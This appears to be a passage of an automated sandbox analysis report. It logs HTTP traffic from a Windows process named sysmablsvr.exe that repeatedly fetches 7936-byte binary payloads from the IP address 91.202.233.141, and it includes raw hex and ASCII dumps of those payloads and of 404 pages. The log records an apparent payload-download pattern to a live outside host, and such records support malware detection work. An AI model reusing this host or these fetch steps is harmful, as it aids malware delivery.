                                            Data Ascii: *K+Fnho-G"\y`)VaG{.W,JGK=I?JMBL~+~^>[9ZU>qWV27Su_Fp%+fW?yhGk\S |{O/Uib[mHxO||=} %p6Ie!$FlN:bl?l,vF}>dl 87IX2ctIB9Abf9ui1p6{P,S}0?6V*.:?.`&T,Fb)PhcX1%UFgKX::=Wg*6R1)y5j[AQ&5LaJ)QD'@X+X-{j ^p[]>LeWI|$ICiwd@g&,C\cXbW_IWx0 ufHlij~PFA4TKD!zV[VNV}$6Jp[<|"Hfm$d9o=x 3j6Wk12LAyL=}IABtckwuq{W2w8y9cd!dSl(?,`)i^H(x|0?C~DUK:tMCr;d|lYie9+X||_#cc2N>a!q'oD==b^aR9=zf*PIQInkWZxB#bS_Y^2*Z&"T?~D~O
                                            Sep 17, 2024 23:10:01.236279011 CEST1236INData Raw: 21 22 e3 3a f8 64 ed d3 d6 31 f1 21 9f b6 49 60 d1 75 52 5e ed 96 2c 17 37 72 75 59 0c 38 aa 2c 14 89 b2 94 d9 b1 c4 bd cb 69 56 13 c2 e6 c2 4e 94 42 4c ab a8 13 37 df f1 30 27 8c df 4b 21 83 34 e8 67 0f 49 3f 73 b3 69 87 e4 53 75 2d 56 b7 3f e5
                                            Data Ascii: !":d1!I`uR^,7ruY8,iVNBL70'K!4gI?siSu-V?e2^(+#;,x{NsU{/>=NOcqHh6mzy~U;)/K</|{.f'O,,<=UjE-mJ,),FTuj0}YGHAWZm`%
                                            Sep 17, 2024 23:10:01.236289978 CEST1236INData Raw: 8c 7b d2 94 10 81 50 02 1b f8 df 9c 7f 20 a6 79 88 80 16 5a 89 90 19 d2 e1 21 c1 03 6c bf ad d8 ca 8d 65 26 17 dd 85 b6 e9 74 10 0a 32 72 30 5e 5e 67 6f d9 b8 a2 0f ab d9 01 62 52 0b 22 28 1c dd ba 4f 78 04 0a 46 20 b2 6c 00 d2 ad 9b 5c 62 8b 2f
                                            Data Ascii: {P yZ!le&t2r0^^gobR"(OxF l\b/{X$5vNXE!`FLNcS^)lQ l-Ts}R;$9DT?b(UGnw,";f+Q6vJ?U<6AQtn\&*8~/bUuq8
                                            Sep 17, 2024 23:10:01.236361027 CEST1236INData Raw: ec 6d 0b 68 66 0c c2 5d 9d 2a ae 94 6f df 44 73 f6 1d c9 bb 43 46 5c a8 84 41 08 ae 20 cd 6a b7 f1 a1 ad f4 8f cd 30 2e 38 77 b2 97 65 2d a5 44 ec b4 3b 2b 85 ef 49 41 9f 20 4c e0 76 6d d2 4d 78 9f b7 09 ee 55 58 52 90 1c 29 02 5a a8 4d 8b bc 8a
                                            Data Ascii: mhf]*oDsCF\A j0.8we-D;+IA LvmMxUXR)ZMDBY[A1dG5!j|Gb&v2]G\BspIQqTi3&ys?ok`Y{5*Va'NX^~s/.^[o3(]G9F]cPIT\+2n^a(`
                                            Sep 17, 2024 23:10:01.236372948 CEST1236INData Raw: 10 0d 0b b9 5f 9d 6d e6 92 57 24 32 d1 17 e9 b2 d9 ae 0d 71 a1 d0 f5 93 db 74 24 44 1d 9c e2 88 95 42 43 e3 6d 72 fc 78 0b 0c 45 d3 b3 36 15 f1 98 ab 5f 59 68 bb c4 59 ff aa da 7d a2 ad c0 0d 7b 82 2d 3b 08 0f 12 be 08 9a 06 81 47 b2 42 9b 80 69
                                            Data Ascii: _mW$2qt$DBCmrxE6_YhY}{-;GBiuMPyVE=hEN+kq?<'e>4bcb7Ki<=b"x5V$)VO$&<B0^MgOFzgQTfHO_T1*6vX
                                            Sep 17, 2024 23:10:01.236382961 CEST1236INData Raw: 8a 04 bc 40 2f 0c e0 a9 d6 0a e2 f7 14 8f ae 57 56 3d 2a bf 40 a3 25 fe 65 17 b7 f6 2f da 29 64 e9 6d 89 dc fd a5 6c 7b b4 e5 b8 72 df 7e 9d 10 04 92 d4 19 f1 8d 30 01 70 8c 1d 49 81 05 99 27 00 4f 7d 7a 9d c1 12 6d da 6c 5e f7 bb 5a cd 3d cf 8c
                                            Data Ascii: @/WV=*@%e/)dml{r~0pI'O}zml^Z=ksq#t]ID4CX<Vq/P:_NwB)xJkGC~ua"5I5nKy+Y{?bCI%Xm01:._&u>}@_`T
                                            Sep 17, 2024 23:10:01.236394882 CEST1236INData Raw: 30 57 86 af d6 c6 d3 34 95 3c 80 7e d4 8e 1c 90 01 dd 15 ca 71 10 9c 00 3b 53 0d 8c 64 86 20 42 75 94 c9 97 a4 ac 14 92 66 db cc e6 0b 41 93 bc 48 e3 00 cf 52 69 31 9b 26 f3 80 24 67 53 5d 3c 93 84 ba bb 51 1f 7e 2a d4 23 20 45 21 36 94 89 af 9c
                                            Data Ascii: 0W4<~q;Sd BufAHRi1&$gS]<Q~*# E!6:0x[EP-Xn\fv$4X,.YR:Ev%o)p k WkB6eCt@R`}2WP`YJM$3z?5\ JPql
                                            Sep 17, 2024 23:10:01.236784935 CEST1236INData Raw: f9 22 9d 01 2b fd 11 5a 19 b7 74 3c 7d 58 9a d4 0d e0 14 a2 0d 47 fd c5 51 f2 b7 9a f7 48 65 ed 09 41 ba 81 e1 6c bb df 4d 7f 56 a2 00 f2 66 ff a8 c5 e0 fc 39 3a bc e6 d4 2e fd 2b c0 af c0 29 76 67 bd f2 ec 0e 7c 1d da eb 7b fd b7 62 3a b7 39 f1
                                            Data Ascii: "+Zt<}XGQHeAlMVf9:.+)vg|{b:9&&Qn1MW.Ob+am9W-@;fG@cP=YxuF HH;,TTu,zmDU'?lCk=Sbi@iK\eDw"wV
                                            Sep 17, 2024 23:10:01.236805916 CEST1236INData Raw: 8c c8 46 fd 7c b3 b9 a1 94 a6 7b 4b c1 71 aa e7 a4 be 30 e5 5f 0e 05 16 bc 74 a8 2d 5c 2f 95 72 38 4e e1 76 31 86 be b0 b9 4d c9 83 64 b1 2d 19 3d 98 16 3b 2f 0b ec e9 18 da 39 a9 18 f7 a4 82 1f a4 33 02 ce 29 81 12 bd c3 f7 91 1b 26 27 d1 55 5c
                                            Data Ascii: F|{Kq0_t-\/r8Nv1Md-=;/93)&'U\]JvjS*g4!]ReebGCh+;`4TO{ZVj{726Vij&)q C*(*N|3q.C2&_JcQqGnwR
                                            Sep 17, 2024 23:10:01.236819029 CEST1236INData Raw: 18 3e a6 e8 85 bc a6 54 db 4a 14 bc ac 5a 13 7e 50 e4 f7 f8 90 7e 8e c4 4e d6 4a 50 6c 97 a3 82 31 ec 59 be 4c 6f 38 62 b9 d7 4e 68 c4 e0 fb 81 94 96 eb 34 f8 ef 65 4d 72 0c e4 72 b0 61 ad 02 27 c5 b1 82 5c 94 03 fd 50 45 43 36 7b e0 0c a7 45 e4
                                            Data Ascii: >TJZ~P~NJPl1YLo8bNh4eMrra'\PEC6{E\?&SgIqzEfMCz1U74;B3Q&maoMkjyt'K1H(,TNK#/S|eQ2/f[C]A-Z&QQ>RuvF&0
                                            Sep 17, 2024 23:10:01.241662025 CEST449INData Raw: 27 ce c4 b5 6b ea 96 54 3d fe 4f 4d 3d 18 9a a1 b4 15 32 01 38 10 4e b7 4b ed fb 49 c1 d8 b2 5d 08 75 1d 81 79 d8 fa b0 b2 98 90 35 9e 31 36 5f 4e 44 ef 33 04 01 c4 0a 90 70 41 47 fe 67 04 e6 85 b5 53 5f db c8 6e c0 79 b3 52 d8 7e 01 47 5e d2 91
                                            Data Ascii: 'kT=OM=28NKI]uy516_ND3pAGgS_nyR~G^{43e^W-qMw[~PA)LW!^LczVym_ZAVcYoZx%$[_j2\u\wch~;[E5}uiIj^A
                                            Sep 17, 2024 23:10:07.443656921 CEST166OUTGET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:10:07.663274050 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:07 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Wed, 11 Sep 2024 10:30:26 GMT
                                            Connection: keep-alive
                                            ETag: "66e17142-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 2e 7e f0 5e 84 6b f0 eb 96 ea 4a 6a d8 5c 77 e1 0b 06 58 4d 99 2c 1c 04 2f ab f2 50 5c 0c 95 19 8b 0a b6 9e 12 c0 c5 a8 d5 56 11 38 8f 5a 61 6f 19 90 c7 21 70 7f ee 82 f6 69 81 73 e3 fe da 22 ae 77 39 00 16 34 6f 1a 91 a1 f1 d0 db 37 76 be 4b 27 f1 36 32 8d 2e fd 5e cf b1 00 eb 4b 72 16 21 fd 5c af 45 41 d6 dc 46 a7 a7 e4 45 2e 69 9b 06 a3 32 f4 2b 33 80 bb af 3b f3 5f ad 27 90 a3 00 e9 46 fd 3c 04 0e c1 67 84 7e 9c 01 83 74 da e3 d2 f0 ab 40 1c 53 24 d1 7c 12 d9 02 5e fb a8 0e 2f 33 2d 18 4d 12 2a 24 2d d6 3a 4f 0d 0a 00 b1 76 b9 36 1d 63 79 91 40 ae ce 13 9c d5 a6 70 91 ba 2d cc fb 81 2c 3a 62 fc 77 e1 a0 26 41 29 95 b0 01 1f b1 1e cc 7d fe 6e 33 68 b8 ad 89 e6 44 48 3e c9 67 be 8e 5f c5 22 f6 97 b0 e0 6b ec a6 b0 ca 48 a4 be 6a f0 74 98 ba 90 11 74 b3 2f 03 da 20 16 56 df e7 78 73 60 c7 81 c6 06 ee 5c ff fa 65 60 8b d1 30 e8 2e 41 f1 b3 e8 20 39 24 a6 dd 9d 32 8f ed 28 25 51 fe 08 50 97 5b ca a9 8a e9 8d 34 8c 38 5d 8d 79 3d 26 ab cb 83 d5 9b 9d a9 20 d6 17 ed 94 d9 df cd 3b 61 02 b3 45 55 c0 de [TRUNCATED]
                                            Data Ascii: .~^kJj\wXM,/P\V8Zao!pis"w94o7vK'62.^Kr!\EAFE.i2+3;_'F<g~t@S$|^/3-M*$-:Ov6cy@p-,:bw&A)}n3hDH>g_"kHjtt/ Vxs`\e`0.A 9$2(%QP[48]y=& ;aEUzrgRGX{Hi|IUeR9.!HJYCou=3_wev,qbsbT9BX'F,DnBoiYSgDzp.IA+V.QcRhXu>N![2V]pLXe%kYR#rOBoRust[cJv6|+$kv:?c8jO)~m><X`Vk,.d+z})P|~h?n)W,H;]6~}RZ_Zjx"~?mkV";G`mN$+_R~lwR!LoQ_gzfg6:FfvJr-t`i;w$K\P9!jtErORbT|[`WK^&bO50omvD0w:]CLW


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.44975191.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:08.681487083 CEST166OUTGET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:10:10.219350100 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:09 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Wed, 11 Sep 2024 10:30:26 GMT
                                            Connection: keep-alive
                                            ETag: "66e17142-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 2e 7e f0 5e 84 6b f0 eb 96 ea 4a 6a d8 5c 77 e1 0b 06 58 4d 99 2c 1c 04 2f ab f2 50 5c 0c 95 19 8b 0a b6 9e 12 c0 c5 a8 d5 56 11 38 8f 5a 61 6f 19 90 c7 21 70 7f ee 82 f6 69 81 73 e3 fe da 22 ae 77 39 00 16 34 6f 1a 91 a1 f1 d0 db 37 76 be 4b 27 f1 36 32 8d 2e fd 5e cf b1 00 eb 4b 72 16 21 fd 5c af 45 41 d6 dc 46 a7 a7 e4 45 2e 69 9b 06 a3 32 f4 2b 33 80 bb af 3b f3 5f ad 27 90 a3 00 e9 46 fd 3c 04 0e c1 67 84 7e 9c 01 83 74 da e3 d2 f0 ab 40 1c 53 24 d1 7c 12 d9 02 5e fb a8 0e 2f 33 2d 18 4d 12 2a 24 2d d6 3a 4f 0d 0a 00 b1 76 b9 36 1d 63 79 91 40 ae ce 13 9c d5 a6 70 91 ba 2d cc fb 81 2c 3a 62 fc 77 e1 a0 26 41 29 95 b0 01 1f b1 1e cc 7d fe 6e 33 68 b8 ad 89 e6 44 48 3e c9 67 be 8e 5f c5 22 f6 97 b0 e0 6b ec a6 b0 ca 48 a4 be 6a f0 74 98 ba 90 11 74 b3 2f 03 da 20 16 56 df e7 78 73 60 c7 81 c6 06 ee 5c ff fa 65 60 8b d1 30 e8 2e 41 f1 b3 e8 20 39 24 a6 dd 9d 32 8f ed 28 25 51 fe 08 50 97 5b ca a9 8a e9 8d 34 8c 38 5d 8d 79 3d 26 ab cb 83 d5 9b 9d a9 20 d6 17 ed 94 d9 df cd 3b 61 02 b3 45 55 c0 de [TRUNCATED]
                                            Data Ascii: .~^kJj\wXM,/P\V8Zao!pis"w94o7vK'62.^Kr!\EAFE.i2+3;_'F<g~t@S$|^/3-M*$-:Ov6cy@p-,:bw&A)}n3hDH>g_"kHjtt/ Vxs`\e`0.A 9$2(%QP[48]y=& ;aEUzrgRGX{Hi|IUeR9.!HJYCou=3_wev,qbsbT9BX'F,DnBoiYSgDzp.IA+V.QcRhXu>N![2V]pLXe%kYR#rOBoRust[cJv6|+$kv:?c8jO)~m><X`Vk,.d+z})P|~h?n)W,H;]6~}RZ_Zjx"~?mkV";G`mN$+_R~lwR!LoQ_gzfg6:FfvJr-t`i;w$K\P9!jtErORbT|[`WK^&bO50omvD0w:]CLW
                                            Sep 17, 2024 23:10:10.219369888 CEST224INData Raw: a4 17 e7 bb 21 6c dd 35 58 41 57 e9 a9 92 ec 85 6f 50 16 1e 1c 67 80 62 32 9a 78 28 be 5d c5 c2 07 8f 75 83 8b 99 bf 65 68 45 29 25 90 da 08 b9 0f f3 5c a8 1f ff 5b 9b a1 ea bc e2 dd d8 8f 99 11 db 43 82 1b 7c 82 21 62 4b 2c cc d3 18 19 1e 3b 06
                                            Data Ascii: !l5XAWoPgb2x(]uehE)%\[C|!bK,;TSdr34S^sfN[8fob.4Zj=,lD<0jb<8epOLLTtcA7$V~M1o"hn8}-IEG;ukG
                                            Sep 17, 2024 23:10:10.219382048 CEST1236INData Raw: 28 87 17 33 95 8c ae 7e 2d 83 25 f5 ee f5 cd 4f ae 78 df 70 b2 b9 87 16 18 31 e8 50 6a 09 21 41 75 f4 d0 3f da 11 b9 48 05 4d c3 ba 8c 6d 6c 35 60 51 5a 8b d2 1f 8c 41 8d fd a4 06 e6 4f 64 af 2c 0d f5 46 de ae 4d d6 dd fe 1d 27 9f 6d ef 4f 8a e1
                                            Data Ascii: (3~-%Oxp1Pj!Au?HMml5`QZAOd,FM'mO(8.6bN dwN[('qu(28mohRq\)Q*gxBE#GD>"2}A"bKMVg%yS7uJiqtn1uG@
                                            Sep 17, 2024 23:10:10.219510078 CEST1236INData Raw: a9 40 9c 86 49 ba 55 69 74 20 f8 f1 cd 29 67 db 71 fa e0 e0 92 9a 0f cc 6e 4a ab 49 66 bf ec 35 dc 78 25 b8 5a a7 f8 7a 3c 91 04 b7 fa 9b a1 b3 c6 91 d7 02 b4 43 41 57 ca 57 2d 2c d6 27 ea 81 60 eb d2 76 69 82 03 fb d9 1a be ed 25 13 75 fc 15 9a
                                            Data Ascii: @IUit )gqnJIf5x%Zz<CAWW-,'`vi%u@hW]?5@_^Q`Z-MBwiSe1{:&mp6zVwAQr!)aa3 0wOo/WQYn\xSrCi
                                            Sep 17, 2024 23:10:10.219521046 CEST1236INData Raw: 84 9a 8a 45 4a bf b3 e2 5f 6b 0d ea 08 f9 0a 00 0f 6d ec 9e 3f d9 b5 c5 bd 03 99 76 b7 23 b4 ca 34 79 72 55 16 8f 82 18 2f a8 4c 21 42 80 3d ce 52 3a b7 e2 31 d5 ae e3 52 83 e8 7b 62 f9 78 10 6e 2e e0 1f f4 8a 98 53 11 16 d1 f4 1f e4 f1 5d dd 7d
                                            Data Ascii: EJ_km?v#4yrU/L!B=R:1R{bxn.S]}ZY4[zXo6#W<yyW.3,_L!Eq$V*=<aFXbWfYyN6Vg%R%ju=> 7pVn?"
                                            Sep 17, 2024 23:10:10.219531059 CEST1236INData Raw: 49 ca 8f dc 77 9c 31 0c 97 56 0e a6 e4 f1 28 8b b1 2c d8 41 e0 f2 9d 13 28 3c 32 f4 f2 0f 01 54 2e 48 06 23 9a e8 7e 1e 1c c1 6b 9d f9 a4 f0 93 01 cf 2c 39 18 ed 59 a8 04 10 58 d7 d6 86 fe 81 be 05 8a c3 5d 2c 1a 1e 07 5a fd 8a dd a6 1f e8 ab ba
                                            Data Ascii: Iw1V(,A(<2T.H#~k,9YX],ZtIe;Oc| r1.weH&l;=):v4qOa l}9D7;FIIa~IUm54_|5E
                                            Sep 17, 2024 23:10:10.219542027 CEST1236INData Raw: e3 a2 e9 8d 3f 04 b9 f4 6b c4 55 58 1b 5c e1 69 41 13 bd d5 6c fa 9d 5b 07 da a0 c6 c8 17 cf d4 09 c3 5b 60 77 37 c0 a6 6a 99 3b 82 40 4d 78 9c 19 7c 3b 97 8d ce 15 de 66 dc 26 59 de ac fb c5 6e af d8 6d ca 71 c7 7b e0 6b 50 99 0f 64 72 41 68 98
                                            Data Ascii: ?kUX\iAl[[`w7j;@Mx|;f&Ynmq{kPdrAh9_\.y>{&wD8"Jn{l<[^`IIVuH"8n7wnY13_' P*wYiSYz_v?BDte`)>1fph,
                                            Sep 17, 2024 23:10:10.219670057 CEST552INData Raw: 4a 35 96 13 41 62 bf 97 71 f3 e5 ea 1b dc d2 ac a0 be d0 06 91 71 be ca 0c 04 26 bf 8e 2b 4f bc 40 c3 d8 51 dd 9f 3c 3c 55 14 14 e1 a7 cc 85 bf 3b 2e d4 0e 91 7c 7c 71 d7 68 1a 92 a4 5c 8b e5 45 8a b6 27 a1 8a 92 e7 3b b7 b6 d2 91 77 12 87 38 1f
                                            Data Ascii: J5Abqq&+O@Q<<U;.||qh\E';w8 iJB o`^H.is@?z'"E#CBN"Ey&)GA"'X]XK.oIEv+}'(d#9N=O
                                            Sep 17, 2024 23:10:10.219680071 CEST552INData Raw: 4a 35 96 13 41 62 bf 97 71 f3 e5 ea 1b dc d2 ac a0 be d0 06 91 71 be ca 0c 04 26 bf 8e 2b 4f bc 40 c3 d8 51 dd 9f 3c 3c 55 14 14 e1 a7 cc 85 bf 3b 2e d4 0e 91 7c 7c 71 d7 68 1a 92 a4 5c 8b e5 45 8a b6 27 a1 8a 92 e7 3b b7 b6 d2 91 77 12 87 38 1f
                                            Data Ascii: J5Abqq&+O@Q<<U;.||qh\E';w8 iJB o`^H.is@?z'"E#CBN"Ey&)GA"'X]XK.oIEv+}'(d#9N=O
                                            Sep 17, 2024 23:10:10.219687939 CEST8INData Raw: 21 9c 14 4f 88 47 9c c5
                                            Data Ascii: !OG
                                            Sep 17, 2024 23:10:10.220110893 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:09 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Wed, 11 Sep 2024 10:30:26 GMT
                                            Connection: keep-alive
                                            ETag: "66e17142-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 2e 7e f0 5e 84 6b f0 eb 96 ea 4a 6a d8 5c 77 e1 0b 06 58 4d 99 2c 1c 04 2f ab f2 50 5c 0c 95 19 8b 0a b6 9e 12 c0 c5 a8 d5 56 11 38 8f 5a 61 6f 19 90 c7 21 70 7f ee 82 f6 69 81 73 e3 fe da 22 ae 77 39 00 16 34 6f 1a 91 a1 f1 d0 db 37 76 be 4b 27 f1 36 32 8d 2e fd 5e cf b1 00 eb 4b 72 16 21 fd 5c af 45 41 d6 dc 46 a7 a7 e4 45 2e 69 9b 06 a3 32 f4 2b 33 80 bb af 3b f3 5f ad 27 90 a3 00 e9 46 fd 3c 04 0e c1 67 84 7e 9c 01 83 74 da e3 d2 f0 ab 40 1c 53 24 d1 7c 12 d9 02 5e fb a8 0e 2f 33 2d 18 4d 12 2a 24 2d d6 3a 4f 0d 0a 00 b1 76 b9 36 1d 63 79 91 40 ae ce 13 9c d5 a6 70 91 ba 2d cc fb 81 2c 3a 62 fc 77 e1 a0 26 41 29 95 b0 01 1f b1 1e cc 7d fe 6e 33 68 b8 ad 89 e6 44 48 3e c9 67 be 8e 5f c5 22 f6 97 b0 e0 6b ec a6 b0 ca 48 a4 be 6a f0 74 98 ba 90 11 74 b3 2f 03 da 20 16 56 df e7 78 73 60 c7 81 c6 06 ee 5c ff fa 65 60 8b d1 30 e8 2e 41 f1 b3 e8 20 39 24 a6 dd 9d 32 8f ed 28 25 51 fe 08 50 97 5b ca a9 8a e9 8d 34 8c 38 5d 8d 79 3d 26 ab cb 83 d5 9b 9d a9 20 d6 17 ed 94 d9 df cd 3b 61 02 b3 45 55 c0 de [TRUNCATED]
                                            Data Ascii: .~^kJj\wXM,/P\V8Zao!pis"w94o7vK'62.^Kr!\EAFE.i2+3;_'F<g~t@S$|^/3-M*$-:Ov6cy@p-,:bw&A)}n3hDH>g_"kHjtt/ Vxs`\e`0.A 9$2(%QP[48]y=& ;aEUzrgRGX{Hi|IUeR9.!HJYCou=3_wev,qbsbT9BX'F,DnBoiYSgDzp.IA+V.QcRhXu>N![2V]pLXe%kYR#rOBoRust[cJv6|+$kv:?c8jO)~m><X`Vk,.d+z})P|~h?n)W,H;]6~}RZ_Zjx"~?mkV";G`mN$+_R~lwR!LoQ_gzfg6:FfvJr-t`i;w$K\P9!jtErORbT|[`WK^&bO50omvD0w:]CLW
                                            Sep 17, 2024 23:10:10.223161936 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:09 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Wed, 11 Sep 2024 10:30:26 GMT
                                            Connection: keep-alive
                                            ETag: "66e17142-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 2e 7e f0 5e 84 6b f0 eb 96 ea 4a 6a d8 5c 77 e1 0b 06 58 4d 99 2c 1c 04 2f ab f2 50 5c 0c 95 19 8b 0a b6 9e 12 c0 c5 a8 d5 56 11 38 8f 5a 61 6f 19 90 c7 21 70 7f ee 82 f6 69 81 73 e3 fe da 22 ae 77 39 00 16 34 6f 1a 91 a1 f1 d0 db 37 76 be 4b 27 f1 36 32 8d 2e fd 5e cf b1 00 eb 4b 72 16 21 fd 5c af 45 41 d6 dc 46 a7 a7 e4 45 2e 69 9b 06 a3 32 f4 2b 33 80 bb af 3b f3 5f ad 27 90 a3 00 e9 46 fd 3c 04 0e c1 67 84 7e 9c 01 83 74 da e3 d2 f0 ab 40 1c 53 24 d1 7c 12 d9 02 5e fb a8 0e 2f 33 2d 18 4d 12 2a 24 2d d6 3a 4f 0d 0a 00 b1 76 b9 36 1d 63 79 91 40 ae ce 13 9c d5 a6 70 91 ba 2d cc fb 81 2c 3a 62 fc 77 e1 a0 26 41 29 95 b0 01 1f b1 1e cc 7d fe 6e 33 68 b8 ad 89 e6 44 48 3e c9 67 be 8e 5f c5 22 f6 97 b0 e0 6b ec a6 b0 ca 48 a4 be 6a f0 74 98 ba 90 11 74 b3 2f 03 da 20 16 56 df e7 78 73 60 c7 81 c6 06 ee 5c ff fa 65 60 8b d1 30 e8 2e 41 f1 b3 e8 20 39 24 a6 dd 9d 32 8f ed 28 25 51 fe 08 50 97 5b ca a9 8a e9 8d 34 8c 38 5d 8d 79 3d 26 ab cb 83 d5 9b 9d a9 20 d6 17 ed 94 d9 df cd 3b 61 02 b3 45 55 c0 de [TRUNCATED]
                                            Data Ascii: .~^kJj\wXM,/P\V8Zao!pis"w94o7vK'62.^Kr!\EAFE.i2+3;_'F<g~t@S$|^/3-M*$-:Ov6cy@p-,:bw&A)}n3hDH>g_"kHjtt/ Vxs`\e`0.A 9$2(%QP[48]y=& ;aEUzrgRGX{Hi|IUeR9.!HJYCou=3_wev,qbsbT9BX'F,DnBoiYSgDzp.IA+V.QcRhXu>N![2V]pLXe%kYR#rOBoRust[cJv6|+$kv:?c8jO)~m><X`Vk,.d+z})P|~h?n)W,H;]6~}RZ_Zjx"~?mkV";G`mN$+_R~lwR!LoQ_gzfg6:FfvJr-t`i;w$K\P9!jtErORbT|[`WK^&bO50omvD0w:]CLW
                                            Sep 17, 2024 23:10:16.630811930 CEST166OUTGET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:10:16.846080065 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:16 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                            Sep 17, 2024 23:10:19.690042019 CEST166OUTGET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:10:19.905354023 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:19 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
